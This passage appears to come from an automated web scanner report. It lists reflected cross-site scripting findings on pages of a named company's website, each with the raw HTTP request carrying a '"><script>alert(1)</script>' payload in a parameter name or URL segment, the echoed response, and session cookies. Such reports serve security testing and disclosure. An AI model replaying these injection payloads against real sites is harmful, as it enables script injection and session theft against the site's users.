User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7655
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/education/?53a03"><script>alert(1)</script>3bcd5e7e3f0=1">
...[SNIP]...

1.34. http://www.janestcapital.com/ja/workplace/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/workplace/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e12"><script>alert(1)</script>c24cb218320 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ja/workplace/?40e12"><script>alert(1)</script>c24cb218320=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7298
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/workplace/?40e12"><script>alert(1)</script>c24cb218320=1">
...[SNIP]...

1.35. http://www.janestcapital.com/ja/workplace/benefits.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/workplace/benefits.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b1c0"><script>alert(1)</script>4ac3d9d5400 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ja/workplace/benefits.php?7b1c0"><script>alert(1)</script>4ac3d9d5400=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7390
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/workplace/benefits.php?7b1c0"><script>alert(1)</script>4ac3d9d5400=1">
...[SNIP]...

1.36. http://www.janestcapital.com/ja/workplace/faq.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/workplace/faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c175"><script>alert(1)</script>1b4eb87698b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ja/workplace/faq.php?9c175"><script>alert(1)</script>1b4eb87698b=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12083

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/workplace/faq.php?9c175"><script>alert(1)</script>1b4eb87698b=1">
...[SNIP]...

1.37. http://www.janestcapital.com/ja/workplace/internships.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/ja/workplace/internships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87f16"><script>alert(1)</script>0b4592058bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ja/workplace/internships.php?87f16"><script>alert(1)</script>0b4592058bb=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8083

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/workplace/internships.php?87f16"><script>alert(1)</script>0b4592058bb=1">
...[SNIP]...

1.38. http://www.janestcapital.com/technology/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/technology/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7164e"><script>alert(1)</script>b0413f27f64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology/?7164e"><script>alert(1)</script>b0413f27f64=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6418
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/technology/?7164e"><script>alert(1)</script>b0413f27f64=1">
...[SNIP]...

1.39. http://www.janestcapital.com/technology/ocaml.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/technology/ocaml.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4031b"><script>alert(1)</script>52be6399743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology/ocaml.php?4031b"><script>alert(1)</script>52be6399743=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7199
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/technology/ocaml.php?4031b"><script>alert(1)</script>52be6399743=1">
...[SNIP]...

1.40. http://www.janestcapital.com/technology/ocaml.php/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/technology/ocaml.php/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e8fb"><script>alert(1)</script>654c3910e50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology/ocaml.php/x228e8fb"><script>alert(1)</script>654c3910e50 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7200
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/technology/ocaml.php/x228e8fb"><script>alert(1)</script>654c3910e50">
...[SNIP]...

1.41. http://www.janestcapital.com/technology/ocaml.php/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/technology/ocaml.php/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b12e"><script>alert(1)</script>73b41334d53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology/ocaml.php/x22?2b12e"><script>alert(1)</script>73b41334d53=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7203
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/technology/ocaml.php/x22?2b12e"><script>alert(1)</script>73b41334d53=1">
...[SNIP]...

1.42. http://www.janestcapital.com/workplace/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/workplace/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20eea"><script>alert(1)</script>41e601541f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workplace/?20eea"><script>alert(1)</script>41e601541f5=1 HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.janestcapital.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.7.10.1293334270

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6431
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/workplace/?20eea"><script>alert(1)</script>41e601541f5=1">
...[SNIP]...

1.43. http://www.janestcapital.com/workplace/benefits.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/workplace/benefits.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b5db"><script>alert(1)</script>4bfeff04170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workplace/benefits.php?4b5db"><script>alert(1)</script>4bfeff04170=1 HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.janestcapital.com/workplace/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.8.10.1293334270

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6457
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/workplace/benefits.php?4b5db"><script>alert(1)</script>4bfeff04170=1">
...[SNIP]...

1.44. http://www.janestcapital.com/workplace/career.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/workplace/career.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd995"><script>alert(1)</script>2bb33b01705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workplace/career.php?cd995"><script>alert(1)</script>2bb33b01705=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:34:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7030
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/workplace/career.php?cd995"><script>alert(1)</script>2bb33b01705=1">
...[SNIP]...

1.45. http://www.janestcapital.com/workplace/career.php/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/workplace/career.php/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a08e"><script>alert(1)</script>ed4fa0153da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workplace/career.php/x225a08e"><script>alert(1)</script>ed4fa0153da HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7031
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/workplace/career.php/x225a08e"><script>alert(1)</script>ed4fa0153da">
...[SNIP]...

1.46. http://www.janestcapital.com/workplace/career.php/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/workplace/career.php/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a021"><script>alert(1)</script>956f3e188ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workplace/career.php/x22?2a021"><script>alert(1)</script>956f3e188ef=1 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7034
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/workplace/career.php/x22?2a021"><script>alert(1)</script>956f3e188ef=1">
...[SNIP]...

1.47. http://www.janestcapital.com/workplace/faq.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/workplace/faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f218"><script>alert(1)</script>49639158f94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workplace/faq.php?2f218"><script>alert(1)</script>49639158f94=1 HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.janestcapital.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.2.10.1293334270

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9208

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

...[SNIP]...
<a href="/ja/workplace/faq.php?2f218"><script>alert(1)</script>49639158f94=1">
...[SNIP]...

1.48. http://www.janestcapital.com/workplace/internships.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/workplace/internships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0f4"><script>alert(1)</script>2bd19cfc309 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workplace/internships.php?cc0f4"><script>alert(1)</script>2bd19cfc309=1 HTTP/1.1
Host: www.janestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.janestcapital.com/workplace/benefits.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270

Response

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 21:33:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6779
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<m
...[SNIP]...
<a href="/ja/workplace/internships.php?cc0f4"><script>alert(1)</script>2bd19cfc309=1">
...[SNIP]...

1.49. http://www.janestcapital.com/workplace/internships.php/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.janestcapital.com
Path:	/workplace/internships.php/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76e95"><script>alert(1)</script>8d263852bd9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workplace/internships.php/x2276e95"><script>alert(1)</script>8d263852bd9 HTTP/1.1
Host: www.janestcapital.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252582802.1293334270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qp30qlsmc7sdnvhrpe287pt0a4; __utma=252582802.879184777.1293334270.1293334270.1293334270.1; __utmc=252582802; __utmb=252582802.9.10.1293334270;

Response

HTTP/1.1 200 OK
